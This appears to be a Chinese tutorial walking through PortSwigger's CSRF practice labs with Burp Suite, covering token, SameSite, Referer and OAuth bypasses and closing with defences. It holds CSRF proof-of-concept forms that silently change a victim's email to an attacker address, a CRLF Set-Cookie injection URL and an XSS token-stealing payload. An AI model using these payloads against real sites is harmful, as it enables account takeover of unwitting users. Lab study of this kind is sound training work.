当前位置：首页 > article >正文

手把手教你用Burp Suite搞定PortSwigger Labs的CSRF靶场（附12个Lab实战POC）

article 2026/4/7 20:09:34

Burp Suite实战指南12种CSRF漏洞攻防演练在Web安全领域CSRF跨站请求伪造始终是排名前五的高危漏洞类型。PortSwigger Labs作为全球知名的Web安全实战平台其CSRF靶场设计了12个由浅入深的实验场景。本文将带你使用Burp Suite专业版逐个击破这些精心设计的防御机制。1. 基础工具配置与环境准备1.1 Burp Suite基础配置启动Burp Suite后首先确保代理监听器正常运行。在Proxy→Options选项卡中确认本地127.0.0.1:8080处于监听状态。浏览器需要配置相应的代理设置并安装Burp的CA证书通过访问http://burp/cert下载。重要提示每次启动新Lab时务必先清除浏览器缓存并关闭所有插件避免跨实验干扰1.2 靶场环境初始化访问PortSwigger Academy官网选择Web Security Academy下的CSRF专题。每个Lab都会分配唯一的子域名例如https://0acb00ab035f2c2f81b72acd0037008a.web-security-academy.net首次访问时会自动生成实验会话保持该浏览器标签页不关闭即可维持会话状态。2. 无防御机制的CSRF漏洞2.1 基础漏洞原理当应用仅依赖会话Cookie进行身份验证且未校验请求来源时攻击者可以构造恶意表单form actionhttps://target-domain/change-email methodPOST input typehidden nameemail valueattackerevil.com /form scriptdocument.forms[0].submit();/script2.2 Burp生成POC流程使用凭证wiener:peter登录靶场在修改邮箱页面输入测试值如testtest.com拦截请求后右键选择Generate CSRF PoC复制生成的HTML到Exploit Server的Body部分点击Deliver exploit完成攻击验证关键参数对比表参数类型正常请求恶意请求Referer存在缺失Origin同源跨域CSRF Token无无3. 基于请求方法的防御绕过3.1 请求方法校验漏洞某些应用仅在前端限制POST方法但后端实际接受GET请求。在Burp中拦截正常POST请求右键选择Change request method观察响应状态码是否为302重定向成功GET /my-account/change-email?emailhackerevil.com HTTP/1.1 Host: vulnerable-website.com Cookie: sessionvalidSessionId3.2 自动化POC生成技巧在Burp的CSRF PoC生成器中手动修改form的method属性form actionhttps://target/change-email methodGET input typehidden nameemail valuehackerevil.com /form4. 令牌验证机制的多种绕过方式4.1 令牌存在性检查缺陷部分应用仅检查CSRF令牌是否存在而不验证其有效性。测试步骤删除请求中的token参数如果请求仍然成功说明存在漏洞生成不包含token字段的POC4.2 会话绑定缺陷利用当令牌不与用户会话绑定时使用wiener和carlos两个账户分别获取token在Repeater中交叉测试token复用性构造使用其他用户token的恶意请求关键测试用例[ ] Token与会话ID绑定[ ] Token与用户身份绑定[ ] Token单次有效性验证[ ] Token时效性检查5. SameSite Cookie机制的突破方法5.1 方法覆盖技术当Cookie设置为SameSiteLax时form methodGET input typehidden name_method valuePOST input typehidden nameemail valuehackerevil.com /form5.2 客户端重定向利用通过开放重定向漏洞绕过SameSiteStrict查找存在重定向的参数如postId构造路径遍历payload/post/comment/confirmation?postId../my-account/change-email?emailhackerevil.com5.3 同级域XSS组合攻击当存在子域XSS时通过XSS建立WebSocket连接获取敏感信息如其他用户的CSRF token构造复合攻击链fetch(https://vulnerable-subdomain/login, { method: POST, body: usernamescriptstealToken()/scriptpassword123 })6. Referer验证的精准绕过6.1 空Referer攻击当应用仅检查Referer存在性时meta namereferrer contentno-referrer form action/change-email methodPOST !-- 隐藏表单字段 -- /form6.2 部分匹配绕过技巧若验证不严格可通过以下方式伪造history.pushState(, , /victim-domain.com); document.forms[0].submit();配合HTTP头设置Referrer-Policy: unsafe-url7. OAuth流程中的CSRF漏洞7.1 认证流程时序攻击利用OAuth回调时的Cookie刷新script window.open(/social-login); setTimeout(() { document.forms[0].submit(); }, 5000); /script7.2 关键攻击时间窗口必须在以下条件同时满足时触发用户完成OAuth认证新会话Cookie已设置原页面尚未刷新8. 高级漏洞利用实战技巧8.1 CRLF注入设置Cookie通过搜索功能注入自定义Cookie/search?qtest%0d%0aSet-Cookie:%20csrfKeyinjectedValue对应的POC构造img srchttps://target/search?qpayload onerrorsubmitForm()8.2 双重Cookie技巧当应用同时检查请求体和Cookie中的token时document.cookie csrfTokenattackerValue; document.forms[0].submit();9. 防御措施与安全建议9.1 服务端防护方案同源检测Origin/Referer密码学随机Token双重提交Cookie关键操作二次认证9.2 客户端防护策略SameSiteStrict敏感操作CAPTCHA验证短期会话有效期10. 自动化测试脚本示例使用Python自动化检测CSRF漏洞import requests def check_csrf(target_url, cookie): headers {Cookie: cookie} test_payload {email: testcsrf.com} # 测试Token必要性 r1 requests.post(target_url, datatest_payload, headersheaders) # 测试Referer检查 headers[Referer] https://attacker.com r2 requests.post(target_url, datatest_payload, headersheaders) return r1.status_code 200 and r2.status_code 20011. 漏洞修复方案对比不同防御机制的效果评估防御方式实施难度防护效果用户体验影响CSRF Token中等★★★★★低SameSite Cookie简单★★★☆中Referer检查简单★★☆低二次认证复杂★★★★★高12. 实战经验与排错指南常见问题解决方案POC在本地生效但靶场失败检查Exploit Server的URL编码验证SameSite Cookie设置测试不同浏览器的安全策略间歇性成功的攻击确认时间窗口是否足够检查Token的刷新频率添加适当的延迟机制Burp生成POC被拦截尝试手动构造简化版表单使用iframe嵌套规避检测添加迷惑性表单字段

手把手教你用Burp Suite搞定PortSwigger Labs的CSRF靶场（附12个Lab实战POC）

相关文章：

手把手教你用Burp Suite搞定PortSwigger Labs的CSRF靶场（附12个Lab实战POC）

数字记忆守护者：GetQzonehistory实现QQ空间数据本地备份全攻略

径向基RBF神经网络的故障分类与故障诊断的Matlab程序代码

从一张手机照片到4K电影：图解‘位深度’和‘图像大小’是怎么算出来的

告别手写诊断协议！用Canoe的Osek_Tp.dll库，5分钟搞定CAN/CANFD的TP层测试脚本

STM32F4项目实战：用INA219给锂电池做个“智能管家”（附完整代码）

Druid监控页面登录失败？你可能踩了这个Request Body的坑

基于Django REST framework的共享充电桩后台管理系统架构设计与实现

算法岗面试避坑指南：从运动控制到ROS实战的思维跃迁

C++20模块在边缘端编译失败的真相：MSVC/Clang/GCC三大工具链兼容性断层图谱（含实测数据表）

《算法题讲解指南：优选算法-字符串》--61.最长公共前缀，62.最长回文子串，63.二进制求和，64.字符串相乘

为什么你的STL allocator在期货做市系统中突然OOM？——穿透式内存池测试报告（含ASan+Valgrind+自研HeapSpy三重校验）

【快速EI检索 | SPIE出版】2026年量子计算与人工智能国际学术会议（ICQCAI 2026）

Visual C++运行库一站式解决方案：从依赖问题到高效部署

WPF调试神器：如何在GUI应用中优雅地输出Console日志（附完整代码）

【Agent】大模型在线API接入基础入门

Wan2.2-I2V-A14B企业级应用：私有化部署保障数据安全与合规

CAPL不只是写脚本：揭秘它在整车V流程中的五大实战角色（仿真/测试/诊断）

simulink和carsim联合仿真的mpc轨迹跟踪模型。

SEO 优化者如何提高网站的转化率

Carsim+Simulink 线控制动系统BBW-EMB联合仿真模型！BBW-EMB线控制动联合仿真｜Carsim+Simulink】

CefFlashBrowser：Flash内容现代化解决方案与完整应用指南

3步实现Android Studio全界面汉化：让开发者效率提升40%的中文语言包方案

基于拉丁超立方采样的电力系统概率潮流计算实现分析

混合储能系统容量优化配置中的信号分解与容量分配算法解析

磁链观测器在VESC中使用的方法：实现0速闭环启动的工程实践与代码文档仿真对应

Windows Android兼容环境部署指南：跨平台运行的技术实现与实践

音频频谱分析师的成长之路：Spek实战秘籍深度解锁

柔性制造企业数字化工厂系统建设方案：制造业数字化全景图、打造5大引擎内核构建工业数字化底座、数据中台与数据治理、典型应用场景示例

SEO查询优化如何优化网站内链_SEO查询优化如何优化网页标题和描述